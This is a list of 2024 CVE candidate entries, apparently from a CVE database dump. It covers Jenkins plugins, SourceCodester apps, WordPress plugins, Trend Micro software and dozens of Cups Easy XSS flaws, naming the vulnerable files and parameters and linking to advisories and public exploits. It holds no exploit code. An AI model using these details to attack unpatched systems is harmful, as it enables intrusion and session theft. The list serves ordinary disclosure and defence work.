CVE 2024 23940 Candidate Trend Micro uiAirSupport, included in the Trend Micro Security 2023 family of consumer products, version 6.0.2092 and below is vulnerable to a DLL hijacking/proxying vulnerability, which if exploited could allow an attacker to impersonate and modify a library to execute code on the system and ultimately escalate privileges on an affected system. MISC:https://helpcenter.trendmicro.com/en-us/article/tmka-12134 | URL:https://helpcenter.trendmicro.com/en-us/article/tmka-12134 | MISC:https://helpcenter.trendmicro.com/ja-jp/article/tmka-12132 | URL:https://helpcenter.trendmicro.com/ja-jp/article/tmka-12132 | MISC:https://medium.com/@s1kr10s/av-when-a-friend-becomes-an-enemy-55f41aba42b1 | URL:https://medium.com/@s1kr10s/av-when-a-friend-becomes-an-enemy-55f41aba42b1 Assigned (20240124)
CVE 2024 2394 Candidate A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Admin/add-admin.php. The manipulation of the argument avatar leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256454 is the identifier assigned to this vulnerability. MISC:VDB-256454 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256454 | MISC:VDB-256454 | SourceCodester Employee Management System add-admin.php unrestricted upload | URL:https://vuldb.com/?id.256454 | MISC:https://github.com/LiAoRJ/CVE_Hunter/blob/main/RCE-1.md | URL:https://github.com/LiAoRJ/CVE_Hunter/blob/main/RCE-1.md Assigned (20240312)
CVE 2024 2393 Candidate A vulnerability was found in SourceCodester CRUD without Page Reload 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file add_user.php. The manipulation of the argument city leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256453 was assigned to this vulnerability. MISC:VDB-256453 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256453 | MISC:VDB-256453 | SourceCodester CRUD without Page Reload add_user.php sql injection | URL:https://vuldb.com/?id.256453 | MISC:https://github.com/CveSecLook/cve/blob/main/CRUD%20(Create%2C%20Read%2C%20Update%2C%20Delete)%20Without%20Page%20Reload%3ARefresh%20Using%20PHP%20and%20MySQL%20with%20Source%20Code%202/sql-1.md | URL:https://github.com/CveSecLook/cve/blob/main/CRUD%20(Create%2C%20Read%2C%20Update%2C%20Delete)%20Without%20Page%20Reload%3ARefresh%20Using%20PHP%20and%20MySQL%20with%20Source%20Code%202/sql-1.md Assigned (20240312)
CVE 2024 2392 Candidate The Blocksy Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Newsletter widget in all versions up to, and including, 2.0.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051797%40blocksy-companion&new=3051797%40blocksy-companion&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051797%40blocksy-companion&new=3051797%40blocksy-companion&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b937cbfb-d43c-4cda-b247-921661cbc0ad?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b937cbfb-d43c-4cda-b247-921661cbc0ad?source=cve Assigned (20240312)
CVE 2024 23917 Candidate In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240123)
CVE 2024 23910 Candidate Cross-site request forgery (CSRF) vulnerability in ELECOM wireless LAN routers allows a remote unauthenticated attacker to hijack the authentication of administrators and to perform unintended operations to the affected product. Affected products and versions are as follows: WRC-1167GS2-B v1.67 and earlier, WRC-1167GS2H-B v1.67 and earlier, WRC-2533GS2-B v1.62 and earlier, WRC-2533GS2-W v1.62 and earlier, and WRC-2533GS2V-B v1.62 and earlier. MISC:https://jvn.jp/en/jp/JVN44166658/ | URL:https://jvn.jp/en/jp/JVN44166658/ | MISC:https://www.elecom.co.jp/news/security/20240220-01/ | URL:https://www.elecom.co.jp/news/security/20240220-01/ Assigned (20240215)
CVE 2024 2391 Candidate A vulnerability was found in EVE-NG 5.0.1-13 and classified as problematic. Affected by this issue is some unknown functionality of the component Lab Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256442 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256442 | CTI Indicators (IOB, IOC, TTP) | URL:https://vuldb.com/?ctiid.256442 | MISC:VDB-256442 | EVE-NG Lab cross site scripting | URL:https://vuldb.com/?id.256442 | MISC:https://www.exploit-db.com/exploits/51153 | URL:https://www.exploit-db.com/exploits/51153 Assigned (20240312)
CVE 2024 23905 Candidate Jenkins Red Hat Dependency Analytics Plugin 0.7.1 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download. MISC:Jenkins Security Advisory 2024-01-24 | URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3322 | MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins | URL:http://www.openwall.com/lists/oss-security/2024/01/24/6 Assigned (20240123)
CVE 2024 23904 Candidate Jenkins Log Command Plugin 1.0.2 and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read content from arbitrary files on the Jenkins controller file system. MISC:Jenkins Security Advisory 2024-01-24 | URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3334 | MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins | URL:http://www.openwall.com/lists/oss-security/2024/01/24/6 Assigned (20240123)
CVE 2024 23903 Candidate Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token. MISC:Jenkins Security Advisory 2024-01-24 | URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-2871 | MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins | URL:http://www.openwall.com/lists/oss-security/2024/01/24/6 Assigned (20240123)
CVE 2024 23902 Candidate A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier allows attackers to connect to an attacker-specified URL. MISC:Jenkins Security Advisory 2024-01-24 | URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3251 | MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins | URL:http://www.openwall.com/lists/oss-security/2024/01/24/6 Assigned (20240123)
CVE 2024 23901 Candidate Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier unconditionally discovers projects that are shared with the configured owner group, allowing attackers to configure and share a project, resulting in a crafted Pipeline being built by Jenkins during the next scan of the group. MISC:Jenkins Security Advisory 2024-01-24 | URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3040 | MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins | URL:http://www.openwall.com/lists/oss-security/2024/01/24/6 Assigned (20240123)
CVE 2024 23900 Candidate Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects, allowing attackers with Item/Configure permission to create or replace any config.xml files on the Jenkins controller file system with content not controllable by the attackers. MISC:Jenkins Security Advisory 2024-01-24 | URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3289 | MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins | URL:http://www.openwall.com/lists/oss-security/2024/01/24/6 Assigned (20240123)
CVE 2024 2390 Candidate As a part of Tenable’s vulnerability disclosure program, a vulnerability in a Nessus plugin was identified and reported. This vulnerability could allow a malicious actor with sufficient permissions on a scan target to place a binary in a specific filesystem location, and abuse the impacted plugin in order to escalate privileges. MISC:https://www.tenable.com/security/tns-2024-05 | URL:https://www.tenable.com/security/tns-2024-05 Assigned (20240311)
CVE 2024 23899 Candidate Jenkins Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing attackers with Overall/Read permission to read content from arbitrary files on the Jenkins controller file system. MISC:Jenkins Security Advisory 2024-01-24 | URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3319 | MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins | URL:http://www.openwall.com/lists/oss-security/2024/01/24/6 Assigned (20240123)
CVE 2024 23898 Candidate Jenkins 2.217 through 2.441 (both inclusive), LTS 2.222.1 through 2.426.2 (both inclusive) does not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability, allowing attackers to execute CLI commands on the Jenkins controller. MISC:Jenkins Security Advisory 2024-01-24 | URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3315 | MISC:http://www.openwall.com/lists/oss-security/2024/01/24/6 | URL:http://www.openwall.com/lists/oss-security/2024/01/24/6 Assigned (20240123)
CVE 2024 23897 Candidate Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. MISC:Jenkins Security Advisory 2024-01-24 | URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314 | MISC:http://packetstormsecurity.com/files/176839/Jenkins-2.441-LTS-2.426.3-CVE-2024-23897-Scanner.html | URL:http://packetstormsecurity.com/files/176839/Jenkins-2.441-LTS-2.426.3-CVE-2024-23897-Scanner.html | MISC:http://packetstormsecurity.com/files/176840/Jenkins-2.441-LTS-2.426.3-Arbitrary-File-Read.html | URL:http://packetstormsecurity.com/files/176840/Jenkins-2.441-LTS-2.426.3-Arbitrary-File-Read.html | MISC:http://www.openwall.com/lists/oss-security/2024/01/24/6 | URL:http://www.openwall.com/lists/oss-security/2024/01/24/6 Assigned (20240123)
CVE 2024 23896 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stock.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23895 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/locationcreate.php, in the locationid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23894 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancecreate.php, in the issuancedate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23893 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/costcentermodify.php, in the costcenterid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23892 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/costcentercreate.php, in the costcenterid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23891 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemcreate.php, in the itemid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23890 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itempopup.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23889 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemgroupcreate.php, in the itemgroupid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23888 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stocktransactionslist.php, in the itemidy parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23887 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grncreate.php, in the grndate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23886 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemmodify.php, in the bincardinfo parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23885 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrymodify.php, in the countryid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23884 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnmodify.php, in the grndate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23883 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructuremodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23882 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodecreate.php, in the taxcodeid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23881 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23880 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23879 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statemodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23878 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnprint.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23877 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencycreate.php, in the currencyid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23876 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurecreate.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23875 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancedisplay.php, in the issuanceno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23874 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/companymodify.php, in the address1 parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23873 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencymodify.php, in the currencyid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23872 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/locationmodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23871 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/unitofmeasurementmodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23870 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancelist.php, in the delete parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 2387 Candidate The Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms plugin for WordPress is vulnerable to SQL Injection via the ‘integration_id’ parameter in all versions up to, and including, 1.82.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries and subsequently inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/advanced-form-integration/trunk/includes/class-adfoin-log-table.php#L227 | URL:https://plugins.trac.wordpress.org/browser/advanced-form-integration/trunk/includes/class-adfoin-log-table.php#L227 | MISC:https://plugins.trac.wordpress.org/browser/advanced-form-integration/trunk/includes/class-adfoin-log-table.php#L275 | URL:https://plugins.trac.wordpress.org/browser/advanced-form-integration/trunk/includes/class-adfoin-log-table.php#L275 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052201%40advanced-form-integration&new=3052201%40advanced-form-integration&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052201%40advanced-form-integration&new=3052201%40advanced-form-integration&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/45d5a677-9b8b-4258-9cfb-101b0f0e6f6f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/45d5a677-9b8b-4258-9cfb-101b0f0e6f6f?source=cve Assigned (20240311)
CVE 2024 23869 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuanceprint.php, in the issuanceno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23868 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlist.php, in the deleted parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23867 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statecreate.php, in the stateid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23866 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrycreate.php, in the countryid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23865 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
